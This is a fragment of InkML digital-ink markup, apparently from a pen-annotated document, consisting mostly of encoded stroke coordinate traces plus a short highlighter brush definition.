15,0-53-15,18-35 16,17-36-16,18-88 15,-17-17-15,16-18 16,1-18-16,53-34 16,-18-37-16,1 36 15,-1-52-15,-18-36 16,1-18-16,-53-17 16,17-18-16,-17 0 15,70-18 1,-18-35-1,18-35-15,1-53 0,-1-71 16,0 0-16,18-70 16,17-71-16,18-35 15,-88 159-15,0 35 16,71-88-16,-71 52 16,35-52-16,0 0 15,-35 53-15,18 17 16,-36 71-16,0 0 15,0 35-15,-17 18 16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2:54.8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131 5362 0,'0'0'0,"124"18"16,35 0-16,35 17 15,35 0-15,-17-17 16,-18 17-1,-18-35-15,-88 0 16,-35 0-16,0 0 16,-35 0-16,17 0 15,18 0-15,17 0 16,1 0-16,17 0 16,36 18-16,17-18 15,-18 0-15,-17 0 16,-18 0-16,-35 0 15,-35 0-15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2:57.1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04 6668 0,'18'0'15,"-1"0"17,1 0-32,35 17 15,-18 1-15,36-18 16,-18 17-16,0-17 15,17 18-15,-34-18 16,-1 0-16,18 0 31,-36 0-31,19 0 16,-1 0 0,18 0-16,-18 0 15,18 0-15,18 0 16,-1 0-16,18 0 15,53 0-15,-17 0 16,-1 0-16,1 0 16,-18 0-16,17 0 15,18 0-15,-17 0 16,-1 0-16,18 0 16,36 0-16,52 0 15,36 0-15,87 0 16,36 0-16,-17 88 15,35-35-15,-1-18 16,-87 18-16,-54-35 16,-52-18-1,17 0-15,1 0 16,-1 0-16,18 0 0,0 0 16,17 0-1,-17 0-15,36 0 16,-19 0-16,-52 0 15,-1 0-15,1 0 16,-71 0-16,18 0 16,-71 0-16,18 18 15,-35-18-15,-19 17 16,-16-17-16,-1 0 16,-17 0-1,17 0 1,0 0-1,1 0 1,16 0-16,1 0 16,18 0-16,-18 0 15,17 0-15,36 0 16,-53 0-16,18 0 16,-36 0-16,18-17 15,-4092 17-15,8131-18 16,-4057 18-16,-17-18 15,-1 18-15,1 0 16,0-17 0,-1-1-16,1 18 15,35 0 1,-18-18 0,0 18-16,18 0 15,18 0-15,17 0 16,-17 0-16,34 0 15,-16 0-15,52 0 32,-53 0-32,-35 0 0,-18 0 15,0 0-15,-17 0 16,0 0-16,-1 0 16,1 0-16,0 0 15,-1 0 1,1-17-16,-4022-1 31,4057 18-31,4057-17 0,-4075 17 16,-17 0-16,-1 0 15,1-18 1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56.7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689 12646,'19'0,"-1"0,18 18,0-18,19 0,-19 18,37 0,-19-18,73 0,0 18,18-18,0 0,19 0,35 0,37 0,-18-18,-37 18,55-18,-55 18,55 0,-18 0,18 0,36 0,-54 0,-19 0,-54 0,1 18,-56-18,19 18,0 0,-36-18,-1 18,-36-18,37 0,0 0,17 0,-35 0,17 0,1 0,-19 0,19 0,-19 0,1 0,-19 0,18 0,-35 0,35 0,-18 0,1 0,-1 0,-18 0,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11.4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40 3988 0,'0'-20'47,"19"20"-47,1 0 31,0 0-15,20 0-1,39 0-15,20 0 16,60 0-16,20 40 16,19 0-16,20 0 15,1-1-15,-140-19 16,179 20-16,-60-20 15,41-20-15,-41 19 16,-19-19-16,-40 40 16,19-40-16,-58 0 15,38 0-15,-58 0 16,-1 0-16,-19 0 16,-1 0-16,-39 0 15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13.6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24 4028 0,'20'0'62,"20"0"-46,99 0-16,39 0 15,41 0-15,-21 0 16,20 0-16,20 0 16,0 0-16,1 0 15,-21 0-15,-20 0 16,1 0-16,-1 0 15,-19 0-15,-100 0 16,120 0-16,-21 0 16,1 0-16,39 0 15,-39 0-15,39 0 16,-20 0-16,21 0 16,-1 0-16,-39 0 15,-1 0-15,-19 0 16,0 0-16,-20 0 15,-40 0-15,20 0 16,-40 0-16,1 0 16,-61 0-16,61 0 15,19 0-15,0 0 16,-39 0 0,-1 0-16,21 0 0,-21 0 15,21 0-15,-1 0 16,0 0-1,40 0-15,-39 0 16,19 0-16,20 0 16,-40 0-16,-19 0 15,19 0-15,1 0 16,-60 0-16,79 0 16,20 0-16,-20 0 15,40 0-15,-40 0 16,20 0-16,-39 0 15,-41-20-15,21 20 16,-20-20-16,-21 20 16,1-20-16,0 20 125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16.1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56 5159 0,'0'0'0,"20"0"15,0 0-15,19 0 16,21 0-16,19 0 16,-19 0-1,59 0-15,60 0 16,19 0-16,-19 0 15,-120 0-15,120 0 16,19 0-16,-19 0 16,-21 0-16,1 0 15,-20 0-15,0 0 16,-20 0-16,20 0 16,0 0-16,-20 0 15,20 0-15,20 0 16,19 0-16,-39 0 15,0 0-15,-79 0 16,-1 0-16,-19 0 16,-20 0 46,0 0-46,-1 0-1,1 0 17,0 0-17,20 0 1,-20 0 0,59 0-16,0 0 15,1 0-15,59 0 16,-1 0-16,-38 0 15,-1 0-15,0 0 16,-19 0-16,-1 0 16,-39 0-16,39 0 15,0 0-15,1 0 16,-1 0-16,-19 0 16,-1 0-16,21 0 15,-21 0-15,-19 0 16,39 0-16,-39 0 15,39 0-15,1 0 16,-1 0-16,20 0 16,-19 0-16,19 0 15,-40 0-15,-39 0 16,40 0-16,-21 0 16,-19 0-16,20 0 15,0 0-15,-1 0 16,1 0-1,0 0 1,19 0-16,-19 0 16,-20 0-16,0 0 15,-1 0-15,-19-20 16,40 20 0,-40-20-1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26.8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236 6707 0,'60'0'63,"39"0"-48,20 0-15,-59 0 16,98 0-16,21 0 16,59 0-1,-39 0-15,19 0 16,0 0-16,-19 0 15,19 0-15,20 0 16,-59 0-16,-1 0 16,-19 0-16,39 0 15,-98 0-15,39 0 16,-60 0-16,0 0 16,-19 0-16,-40 0 15,39 0-15,-39 0 16,0 0-1,0 0-15,0 0 16,39 0 0,21 0-1,-1 0-15,0 0 16,1 0-16,-21 0 16,-19 0-16,-20 0 15,0 0 63,-1 0-46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28.2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078 6707 0,'-20'0'15,"1"0"1,-1 0-16,-20 0 15,20 0-15,-39 0 16,-1 0-16,-39 40 16,-20-40-16,20 0 15,-20 19-15,19-19 16,-19 0-16,40 0 16,19 0-16,21 0 15,19 0 1,0 0-16,0 0 31,0 0-15,1 0 15,-1 0-31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30.2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21 7997 0,'20'0'32,"0"0"-1,0 0-15,0 0-16,19 0 15,41 0-15,-1 0 16,0 0-16,1 0 15,39 0 1,-20 39-16,0-19 16,-39-20-16,-20 0 15,-21 0 1,1 0 0,0 0-1,0 0 1,0 0-16,0 0 15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3:31.3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064 8056 0,'40'0'31,"0"0"-15,39 0-1,40-39-15,60 39 16,39 0-16,60 0 16,39 0-16,-178 0 15,218 0-15,140 0 16,38-40-16,-98 40 15,-40 20-15,19 59 16,-138 20-16,-79-59 16,-60-20-16,-119-20 15,-1 0-15,-19 20 32,-19-20-1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6:26.7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50 11829,'0'36,"0"37,0 36,0 36,0 18,0 19,0 17,0 37,0-54,0 35,0-35,0-1,0-18,0 1,0 17,-18-36,0 0,18 1,0-19,-18 0,18 18,0-55,0 19,0 0,0 0,0-18,0 36,0-18,0-19,0 19,0-18,0 0,0 17,0 19,0-54,0 18,-19 18,19-19,-18 37,18 0,0-36,0 18,0-37,0-17,0-1,0-17,0-19,0 0,0 18,0-18,0 19,0-1,0-18,0-36,0 0,-18-37,-18-35,-37 17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21.8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06 4410 0,'17'0'78,"54"0"-78,0 0 15,17 0 1,53 0-16,0 0 16,35 0-16,-17 0 15,18 0-15,-1 17 16,-17-17-16,35 0 15,-36 0-15,-16 18 16,104-18 0,-175 0-16,0 0 15,-1 0-15,1 0 16,35 0-16,35 0 16,17 0-16,54 18 15,388 52 1,-4410-35-1,8290 18-15,-4215-35 0,-36-18 16,-17 0-16,-36 0 16,-52 0-16,-19 0 15,-16 0-15,-37 0 16,19-18-16,-36 18 16,36 0-1,-1 0-15,-17 0 16,18 0-16,17 0 0,18 0 15,-18 0 1,-4057 0-16,8150 0 16,-4058 0-16,1 0 15,17 0-15,-53 0 16,35 0-16,-17 0 16,-18 0-16,-17 0 15,0 0-15,-1 0 16,-17 0-16,0 0 15,-18 0-15,1-17 16,-19 17 0,1-18-16,-1 18 31,1 0 188,35 0-204,0 0-15,18 0 16,-1 0-16,18 0 16,36 0-16,-36 0 15,35 0-15,-52 0 16,-18 0-16,-18 0 15,0 0-15,-35-18 16,18 18 156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2.2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754 5680 0,'0'0'0,"124"0"16,17 0-16,0 0 16,18-18-16,-53 0 15,17 1-15,-17 17 16,-53-18-16,-36 18 16,1 0-1,0 0 48,-1 0-32,1 0-31,0 0 16,35 0-16,-36 0 15,18 0-15,1 18 16,17-18-16,0 17 15,17 1-15,-17 0 16,0-18-16,-18 0 16,-17 0-16,0 0 15,-1 0 1,18 17 31,1 1-47,-1-18 15,-17 0-15,17 18 16,0-1-16,0-17 16,-17 0-16,0 0 15,-1 18 1,1-18 15,0 0-31,-1 0 16,1 0-16,17 0 15,1 0 1,16 0-16,-16 0 16,-19 0-16,19 18 15,-19-18 1,1 0 15,-18 17-31,18-17 16,-1 0-16,1 0 15,-1 0 1,1 0-16,0 0 31,-1 0-31,1 0 32,0 0-32,-1 18 15,19-18-15,-19 0 16,18 0-16,1 0 15,17 0-15,-18 0 16,35 0-16,36 0 31,-88 0-31,0 0 16,-1 0 234,1 0-234,0 0 15,17 0-16,0 0-15,0 0 1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4:58.4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76 14024,'18'0,"18"0,18 0,19 0,54 0,-36 0,90 0,-18 0,73 0,18 0,0 0,37 0,17 0,-18 0,-18 0,-36 19,36-19,-36 0,18 0,-36 0,36 0,-18 0,-73 0,0 0,19 0,-1 0,-36 0,1 0,-19 0,0 0,0 0,-37 0,1 0,18 0,-37 0,19 0,18 0,-18 0,36 0,-37 0,1 0,0 0,0 0,-1 0,1 0,0 0,-1 18,1-18,18 0,-18 0,-37 0,1 0,-19 0,-18 0,18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3.1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066 5697 0,'18'0'31,"35"0"-15,18 0-16,-1 0 15,54 0-15,-1 0 16,18 0-16,0 0 16,36 0-16,-1 0 15,-17 0-15,35 0 16,-35 0-16,35 0 16,-53 0-16,-36 0 15,1 0-15,-70 0 16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4.6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587 5856 0,'0'0'0,"18"0"16,0-18 46,-1 18-62,19-17 0,-19 17 16,54-18-16,-54 18 15,36-17 1,0-1-16,0 18 0,-18-18 16,1 18-1,-1-17-15,-17 17 16,35 0-16,-36 0 16,18-18-1,-17 18-15,0 0 16,17 0-16,0 0 15,-17 0-15,35-18 16,0 18-16,17 0 16,54 0-16,-18 0 15,17 0-15,-17 0 16,17 0-16,1 36 16,-36-36-16,-17 17 15,-36 1-15,0-18 16,-17 0-16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6.0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651 5697 0,'0'-17'93,"18"17"-93,35-18 16,-36 18-16,19-18 16,17 1-16,-1 17 15,1 0-15,18 0 16,52 0-16,1 0 15,-18 0-15,35 0 16,0 0-16,-18 0 16,1 0-16,-54 0 15,1 0-15,-53 0 16,35-18 0,-36 18 218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7.1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14 5697 0,'18'0'31,"35"18"-15,35 17-16,0-35 16,35 18-16,36 0 15,18 17-15,-19-35 16,19 17-16,-36-17 16,-18 0-1,-34 0-15,-19 0 16,1 0-16,-18 0 15,-1 0-15,-16 0 16,17 0-16,-18 0 16,18 0-16,0 0 15,-18 0-15,0 0 16,1 0-16,-1 0 16,-18 0-16,36 18 15,-17-18-15,-1 0 16,0 0-1,-17 0-15,0 0 16,-1 0 0,1 0-1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49.0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16 7197 0,'18'0'31,"0"0"-16,17 0 1,-17 17 0,-1-17-16,36 0 15,0 0-15,18 0 16,-1 0-16,71 0 16,-17 0-1,17 0-15,-35 0 0,0 0 16,-1 0-16,-52 0 15,35 0-15,-17 0 16,0 0-16,-18 0 16,17 0-16,-35 0 15,18 0 17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51.7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73 7179 0,'35'0'31,"0"0"-15,-17 0-16,35-18 16,-18 18-16,36 0 15,35 0-15,-18 0 16,35 0-16,18 0 16,0 0-16,18 0 15,18 0-15,-1 0 16,0 0-16,-35 0 15,-35 0-15,0 0 16,-35 0-16,-18 0 16,-18 0-16,18 0 15,-18 0-15,-17 0 16,17 0-16,-17 0 16,-1 0-16,19-17 15,-19 17 1,1-18-1,-1 18 32,19 0-31,17 0 0,35 0-16,-18 0 15,36 0-15,-35 0 16,-1 0-16,1 0 15,-18 0-15,0 0 16,-18 0-16,0 0 16,1 0-16,16 0 15,1 0-15,-17 0 16,-1 0-16,18 0 16,0 0-16,0 0 15,0-18-15,0 18 16,-18-17-16,18 17 15,-18 0-15,18-18 16,0 18-16,0 0 16,0 0-16,17 0 15,-17-17-15,18 17 16,-18 0 0,17-18-16,-17 18 0,0 0 15,0 0-15,0 0 16,17 0-1,-34 0-15,17 0 16,-18 0-16,0 0 16,-17 0-16,17-18 125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53.7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221 7056 0,'0'17'16,"35"-17"0,18 18-16,35-18 15,18 17-15,35-17 16,36 18-16,17 0 15,35-18-15,-17 0 16,35 0-16,-36 0 16,-17 0-16,-53 0 15,-17 0-15,-1 0 32,-87 0-1,-19 0 109,1 0-140,17 0 16,-17 0-16,17 0 16,18 0-16,-18 0 15,-17 0 1,0 0-16,-1 0 16,1 0-1,0-18-15,-1 18 16,1 0-1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54.7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981 7214 0,'0'0'0,"70"0"0,1 0 15,-1 0-15,36 0 16,-35 0-16,-18 0 16,0 0-16,-18 0 15,0 0-15,1 0 16,-19 0-16,18 0 15,1 0-15,-1 0 16,0 0-16,18-17 16,35 17-16,-17 0 15,-18-18-15,88 0 32,-88 1-32,0 17 0,17-18 15,-34 18-15,17 0 16,-36 0-1,18-18-15,1 18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56.1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00 8449 0,'35'0'0,"36"0"15,34 0-15,1 0 16,35 0-1,53 0-15,0 0 0,-35 0 16,-18 0-16,-53 0 16,18 0-1,-35 0-15,-36 0 0,18 0 16,-18 0-16,1 0 16,-19 0-1,18 0-15,-17 0 16,0 0-16,-1-18 15,1 18-15,-4057 0 16,8131 0-16,-4057-17 16,1 17-16,16 0 15,1 0-15,0 0 16,0 0-16,18-18 16,-18 18-16,0 0 15,0 0-15,-1 0 16,1 0-16,-17 0 15,-19 0-15,1 0 16,0 0-16,-1 0 16,18 0-1,-17 0 1,0 0 15,-1 0-31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3:57.1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745 8378 0,'70'0'94,"18"0"-78,54-17-16,-1 17 15,35 0-15,0 0 16,1 0 0,-18 0-16,35 0 15,-18 0-15,18 0 16,0 0-16,-18 0 15,18 0-15,-35 0 16,0 0-16,-18 0 16,0 0-16,-17 0 15,-1 0-15,-35 0 16,18 0-16,18 0 16,-54 0-16,-17 0 15,0 0-15,0 0 16,0 0-16,0 0 15,17 0 1,-17 0-16,18 0 16,-18 0-16,-18 0 0,0 0 15,-17 0 1,17 0-16,-17 17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7:23.077"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.35278" units="cm"/>
      <inkml:brushProperty name="color" value="#B4CDE2"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">3992 13934,'0'18,"0"54,0 37,-19 55,19 35,0 19,0 18,-18 36,18 18,0-54,-18-36,0-19,18 0,-18-90,18-36,0-19,0-18,0 0,0 0,18-18,0 0,0 0,19 0,-19 0,0 0,0 0,0 0,0-18,0 18,-18-18,19 18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5:46.6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774 5788,'0'-19,"0"1,18 18,18 0,19 0,17 0,19 0,36 0,72 0,-35 0,35 18,37-18,36 37,-18-37,18 0,-18 0,-36 0,0 0,0 18,-73-18,-18 0,-18 18,-37-18,-54 0,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4:31.8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4304 0,'17'0'31,"36"0"-15,0 0-16,18 0 16,-1 0-16,-17 0 15,0-18-15,-35 18 16,-1 0 0,1 0-16,0 0 15,-1-17-15,1 17 16,17 0-16,1 0 15,16-18-15,1 18 16,18 0-16,-1-18 16,1 18-16,0 0 15,-1 0-15,54 0 32,-71 0-32,-1 0 15,19 0-15,-36 0 0,18 0 16,0 0-1,-18 0-15,-17 0 16,0-17-16,-1 17 125,19 0-109,17 0-16,-36 0 15,18 0-15,1 0 16,-19 0-16,19 0 16,-1 0-16,-17 0 31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4:43.0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04 10971 0,'18'0'47,"0"0"-31,-1 0-1,18 0 1,18-17 0,71-1-16,70 0 15,18 18-15,17 0 16,-17 0-16,-1 0 15,-17 0-15,-35 0 16,-36 0-16,-34 0 16,-72 0-16,1 0 15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5:41.1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164 4498 0,'-18'0'0,"1"0"31,-1 0-15,-17 0-1,17 0 1,1 0-1,-36-18-15,17 18 0,-52 0 16,18 0-16,-19-35 16,-34 35-1,-18-35-15,-36-1 0,-17 19 16,0-36 0,-17 35-16,70 1 15,17-1-15,36 0 16,35 18-16,18 0 15,-1 0-15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5:43.4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66 10830 0,'18'0'265,"17"0"-249,-17 0 47,-1 0-32,19 0-16,-19 0 1,1 0 0,-1 18-16,1-18 15,0 18-15,-1-18 16,19 0 0,-1 35-16,18-35 15,0 17-15,17-17 16,1 0-1,-18 0-15,0 18 0,0-18 16,-18 0-16,0 0 16,-17 0-1,-18 18-15,18-18 0,-1 0 47,1 0-31,-1 0-16,1 0 0,0 0 15,17 0 1,-17 0 0,-1 0-16,1 0 15,17 0-15,0 0 16,1 0-16,17 0 16,-18 0-16,18 0 15,-18 0-15,-17 0 16,17 0-16,-17 0 15,-1 0 1,1 0 15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5:48.2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37 11060 0,'17'0'31,"36"-18"-16,-18 0-15,1 18 16,-1 0-16,0 0 16,0 0-16,18-17 15,-17 17-15,-19-18 16,19 18-16,-1 0 16,0 0-1,0 0-15,18 0 0,18 0 16,-18 0-16,0 0 15,0 0 1,-18 0-16,-17 0 16,-1 0-1,1 0 17,-1 0-17,1 0 1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34.9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16 4233 0,'18'18'157,"53"-18"-157,-1 0 15,-17 0-15,0 0 16,0 0-16,-35 0 16,17 0-16,-18 0 31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36.2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52 4463 0,'0'-36'78,"35"19"-63,36 17-15,17-18 16,0 18-16,53 0 16,0 0-16,0 0 15,53 0-15,-17 0 16,-36 0-16,35 0 16,-52 0-16,-18 0 15,17 0-15,-35 0 16,18 0-16,-35-18 15,-18 18-15,35-17 16,0-18 0,-53 35-1,18-18-15,0 0 16,0 1-16,18 17 16,-1-18-16,-17 18 15,0 0-15,-18 0 16,-17 0-16,-1 0 15,1 0 1,17 0 0,-17 0-16,0 0 15,17 18-15,0-1 16,-17-17-16,0 0 16,-1 0-16,1 0 31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37.9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9 1570 0,'18'0'32,"35"0"-17,0 0-15,17 0 16,1 0-16,35 0 15,0 0 1,52 0-16,-52 18 16,53-1-16,0 18 15,52-35-15,19 0 16,-19 0-16,19 0 16,-54 0-16,-17 0 15,-18 0-15,-18 0 16,-17 0-16,0 0 15,18 0-15,17 0 16,388 0 0,-229 18-1,53 17-15,35-35 16,88 0-16,-88 0 16,106 0-16,-159 0 15,-53 0-15,-17 0 16,-54 0-16,-34 0 15,-1 0-15,36 36 16,-36-19-16,18 19 16,18-19-16,0 18 15,52 1-15,1-1 16,-36 18-16,36-35 16,-18 17-1,35 18-15,-18-36 0,1 19 16,-36-19-16,18 1 15,-35 35-15,17-36 16,-52 19-16,-1-19 16,18 19-16,0-19 15,-35-17-15,-1 18 16,1 0 0,-35-18-16,17 0 15,-35 0-15,0 0 16,-18 0-16,18 0 15,-18 0-15,-18 0 16,89 0 0,-88 0-16,-1 0 15,-17 0-15,35 0 16,0 0-16,36 0 16,52-18-16,1 0 15,87 18-15,-17 0 16,0 0-16,35 0 15,-70 0-15,0 36 16,-54-19-16,-52-17 16,-53 0-16,-35 0 15,-1 0 79,-17-17-47,0-19-16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42.9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28 10901 0,'0'17'47,"35"-17"-32,71 18-15,18-18 16,-18 0-16,17 0 16,36 0-16,-18 0 15,18 0-15,-1 0 16,-16 0-16,-54 0 16,18 0-16,-36 0 15,-35-18-15,18 18 16,0-17-16,0 17 15,0 0-15,18 0 16,140 0 0,-122 0-1,-19 0-15,-35 0 0,1-18 16,-36-17 203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5:14.2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08 11013 0,'20'0'63,"0"0"-48,20 0-15,39 0 16,0 0-16,40 0 16,20 0-16,-39 0 15,58 0-15,-19 0 16,-20 0-16,20 0 16,20 0-16,-20 0 15,0 0-15,-80 0 16,60 0-16,-19 0 15,19 0-15,-60-20 16,1 20 0,-1 0-16,1 0 15,-1 0-15,-39 0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5:47.6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6 7058,'18'0,"18"0,0 0,19 0,-19 0,19 0,-19 0,18 0,-17 0,17 0,19 0,17 0,19 0,-18 0,0 0,-37 0,0 0,-17 0,-19 0,0 18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1:08:44.3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02 7540 0,'0'20'16,"20"-20"93,39 0-78,-19 0-31,0 0 16,39 0-16,60 0 16,20 0-16,0 0 15,39 0-15,20 0 16,-39 0-16,59 0 16,-40 0-16,-19 0 15,0 20-15,-120-20 16,100 40-16,19-40 15,-39 0-15,0 0 16,-39 0-16,38 0 16,-38 0-16,-21 0 15,0 0-15,1 0 16,-21 0-16,21 0 16,-21 0-16,21 0 15,-21 0-15,1 0 16,-1 0-16,1 0 15,-40 0-15,19 0 16,1 0-16,19 0 16,-19 0-16,20 0 15,-1 0-15,1 0 16,-1 0-16,-19 0 16,20 0-1,-21 0-15,-19 0 16,0 0-16,0 0 31,0 0 141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1:08:50.1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23 7937 0,'0'-20'78,"19"20"-62,21 0 15,-20-19-31,0 19 31,0-20-31,0 20 16,39 0-16,20 0 15,21 0-15,-21 0 16,40 0-16,-20 0 16,40 0-16,-40 0 15,-19 0-15,-1 0 16,40 0-16,-39 0 16,-21 0-16,-19 0 15,19 0-15,1 0 16,-20 0-16,-21 0 15,21 0-15,0 0 16,-20 0-16,0 0 16,-1 0-1,1 0 17,0 0-17,0 0-15,20 0 16,-21 0-16,1 0 15,40 0-15,-20 0 16,19 0-16,1 0 16,-21 0-1,21 0-15,-1 0 16,-19 0-16,0 0 16,39 0-16,20 0 15,-19 0-15,59 0 16,-20-20-16,39 20 15,-39 0-15,20 0 16,-79 0-16,19 0 16,1 0-16,-1 0 15,-19 40-15,-41-40 16,1 0-16,0 19 16,0-19-16,0 0 15,19 0-15,-19 0 16,0 0-16,40 20 15,-41-20-15,21 0 16,-20 0-16,20 0 16,-20 0-16,-1 0 15,1 0-15,0 0 16,0 0 0,0 0-1,0 0 1,19 0-1,-19 0-15,0 0 16,0 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0-15,20 0 16,-20 0-1,-1 0 1,1 0-16,0 0 63,-20 20 3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1:08:51.7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01 7322 0,'80'0'125,"59"0"-125,19 0 15,21 0-15,19 0 16,-19 0-16,39 0 16,-19 0-16,19 0 15,0 0-15,-138 0 16,118 0-16,-39 0 15,39 0-15,-39 40 16,0-1-16,-20-39 16,-80 40-1,100 0-15,-60 0 16,80-1-16,-60-19 16,20 0-16,0-20 15,-1 0-15,1 0 16,-59 0-16,-1 0 15,-19 0-15,-21 0 16,1 0 0,-20 0-16,0 0 15,0 0-15,-1 0 16,1 0-16,0 0 16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6:05.0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19 4499,'37'0,"17"0,19 0,-37 0,91 0,-18 19,18-19,18 0,0 0,0 18,-36-18,-18 0,36 0,-18 0,-1 18,-17-18,-18 0,-19 18,19-18,-37 0,0 0,1 0,-1 0,-36 18,18-18,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6:15.9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68 5806,'18'0,"18"0,18 0,37 0,36 0,36 0,19 18,17-18,19 18,18-18,0 0,-18 0,-19 0,-36 0,-36 0,-36 18,-18-18,-37 0,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6:17.6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91 4481,'18'0,"37"-18,-1 18,1 0,-1 0,0 0,19 0,0 0,-19 0,0 0,1 0,-19 18,19-18,-1 0,-18 18,1 1,-19-19,0 0,0 0,0 0,0 0,0 0,1 18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50:52.0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686 4357 0,'36'0'125,"34"0"-125,1 0 16,-1 0-16,19 0 15,16 0-15,-16 0 16,-19 0-16,18 0 15,-35 0-15,18 0 16,-18 0-16,17 0 16,-17 0-16,18 17 15,-36-17-15,0 0 16,18 18-16,-35-18 16,-1 0-16,19 0 15,-19 18-15,19-18 16,-19 0-1,19 0-15,-19 0 16,36 0-16,-35 0 16,17 0-16,-17 0 15,-1 0 1,19 0-16,-19 0 16,1 0-16,17 0 15,18 0-15,-35 0 16,52 0-16,-34 0 15,-19 0-15,1 0 16,17 0-16,0 0 47,-17 0 0,17 0-32,-17 0 1,35 0-16,17 0 16,-17 0-16,53 0 15,35 0 1,-17 17-16,35 1 0,-36 17 16,18-17-16,-35-18 15,0 0 1,0 18-16,-36-1 15,1-17-15,-18 0 16,17 35-16,-17-35 16,0 0-16,0 18 15,-18-18-15,36 0 16,-18 18-16,17-18 16,1 0-16,-18 0 15,17 17-15,-34-17 16,-1 0-16,-18 0 15,19 0-15,-1 0 16,0 0-16,18 0 16,-18 0-16,18 0 15,18 0-15,-1 0 16,19 0-16,69 36 16,-69-36-16,-19 0 15,18 0-15,1 0 16,34 0-16,-52 17 15,17-17-15,18 0 16,-53 0-16,17 0 16,-17 0-1,-18 0-15,18 0 16,-18 0-16,-17 0 16,0 0-16,-1 0 46,1 0-14,35 0-32,-35 0 15,17 0-15,-17 0 16,-1 36 62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5:52.5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75 4516 0,'0'-18'78,"36"0"-62,52 18-16,18 0 16,0 0-16,35 0 15,0 0-15,35 0 16,-17 0-16,0 0 15,-36 0-15,18 0 16,-35 0-16,-35 0 16,-36 0-16,18 0 15,17 0-15,-34 0 16,34 0-16,-17-17 16,18 17-16,35 0 15,-18-18-15,0 0 16,0 18-16,18 0 15,-18 0 1,0 0-16,1 0 16,-19 0-16,1 0 15,-18 0-15,-1 0 16,1 0-16,-17 0 16,-19 0-16,19 0 15,-19 0-15,1 0 94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5:58.5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37 4216 0,'-18'0'62,"18"17"-46,18-17-16,-1 0 16,18 0-16,1 0 15,17 0-15,0 18 16,-1-18-16,1 0 15,-17 18-15,17-1 16,35-17-16,18 18 16,17 0-16,1-1 15,-36-17-15,35 18 16,-17-18-16,-18 0 16,-17 0-16,-18 0 15,17 0-15,-17 0 16,18 0-16,-1 0 15,36 17-15,-18-17 16,36 0-16,-1 36 16,18-19-16,0 1 15,-17 0-15,52-1 16,-35 19 0,-52-36-16,69 17 15,-52-17-15,-35 0 16,-18 0-16,-36 0 15,19 0 79,-1 0-78,0 0-1,18 0-15,0 0 16,0 0-16,35-17 16,0-1-16,-52 18 15,-1 0-15,-17 0 16,17 0-16,-18 0 62,1 0-62,17 0 16,-17 0 0,17-18-16,-17 18 15,0 0 32,-1 0-31,1 0-1,-1 0 1,19 0 0,-19 0-1,1 0-15,0 0 16,-4058 0-16,8168 0 16,-4093 18-16,0-18 15,18 18-15,0-1 16,-17 1-16,16-18 15,-16 17-15,-19-17 16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06.6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39 10954 0,'36'0'63,"-19"0"-48,19 0-15,-19 0 16,19 0-16,16 0 16,-16 0-16,34 0 15,19 0-15,-19 0 16,-35 0-16,1 0 16,-19 0 46,1 0-46,0 0-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5:48.3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63 7094,'18'0,"19"-18,-1 0,18 18,19 0,72 0,37 0,17 0,73 0,127 0,55 18,108 18,1 55,36-55,54-18,-36 73,-55-55,0 55,-108-73,-127 18,-110-18,-72-18,-36 0,-54 0,-37 0,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08.9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91 10954 0,'18'0'187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11.0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62 11042 0,'0'-18'62,"0"1"-46,18-1 0,17 0-16,18 18 15,17 0-15,36-17 16,-17-1-16,16 0 16,-16 18-1,16-17-15,1-1 0,-35 1 16,-1-1-1,19 0-15,-19 18 16,18 0-16,18 0 16,0-17-16,35 17 15,35 0-15,1 0 16,-1 0-16,54 0 16,-4235 0-1,8115 0-15,-4057 0 16,-17 0-16,16 0 15,1 0-15,36 0 16,-19 0-16,71 0 16,36 0-16,-19 0 15,36 0-15,212 0 32,-212 0-32,35 0 0,-17 0 15,0 0-15,17 0 16,-17 0-16,35 0 15,-18 0-15,-17 0 16,-1 0-16,1 0 16,-18 0-16,194 0 31,-212 0-31,1-18 16,-18 18-16,-18 0 15,-18-18-15,18 1 16,-17 17-16,-1 0 15,-17 0-15,35 0 16,-17 0-16,17 0 16,18 0-16,-36 0 15,53 0-15,-17 0 16,17 0-16,19 0 16,-37 0-16,19 0 15,-36 0-15,-35 0 16,-1-18-16,-34 0 15,35 18-15,-36 0 16,19 0-16,-1 0 16,-18 0-16,19 0 15,-19 0-15,54 0 16,-36 0-16,-18 0 16,19 0-16,-19 0 15,1 0-15,-1 0 16,36-35-16,0 35 15,17 0-15,1-17 16,-1 17 0,-35-18-16,-35 18 0,0 0 15,-35-18 1,0 18 0,17-17-1,-35-1-15,17 18 16,1-18-16,0-17 15,-1 35-15,1-18 16,0 1-16,-1-1 31,1 18 32,0 0-32,-1 0-15,1 0-1,0 0 1,-1 0 15,54-17-15,-1-1-16,36-17 15,18-1-15,-36 36 16,-18 0-16,-17 0 16,-18 0-16,-17 0 31,17 0-31,18 0 16,0 18-16,18-18 15,35 35-15,-18-17 16,35 0-16,1-1 15,-1 1-15,1-1 16,-1-17-16,-35 18 16,36 0-16,-18 17 15,35-17-15,-18-1 16,-17 1-16,-35-18 16,-54 0-16,1 0 15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48.2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97 4463 0,'35'0'15,"18"0"1,53-18-16,-18 18 16,35 0-16,-17 0 15,0 0-15,17 0 16,18 0-16,18 0 16,18 0-1,34 0-15,19 0 0,-1 0 16,88 0-16,71 0 15,142 0-15,-54 0 16,0 0 0,53 0-16,-35 0 15,35 0-15,0 0 16,-52 0-16,52 0 16,-141 0-16,-53 0 15,-88 0-15,0 0 16,-71 0-16,-52 0 15,-1 0-15,-52 0 16,-1-18-16,-17 18 16,-17 0-16,-1 0 15,-17-17-15,-1 17 16,1 0-16,-1-18 234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7:00.8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32 7547,'18'0,"19"0,-19 0,18 0,-18 0,37 0,-19 19,-18-19,37 0,-19 0,36 0,37 0,-36 0,18 0,17 0,-17 0,18 0,-18 0,-19 0,37 0,-18 0,36 0,-36 0,-19 0,37 0,-36 0,17 0,-17 0,36 0,-37 0,1 0,-19 0,19 0,-19 0,1 0,-1 0,1 0,-1 0,19 0,-19 18,19-18,17 0,-35 0,-1 0,1 18,-1-18,0 0,-35 0,17 0,0 0,-18 0,19 0,-1 0,-18 0,18 0,1 0,17 0,-18 0,1 0,-19 0,18 0,0 0,-18 18,1-18,17 18,-18-18,0 0,0 0,0 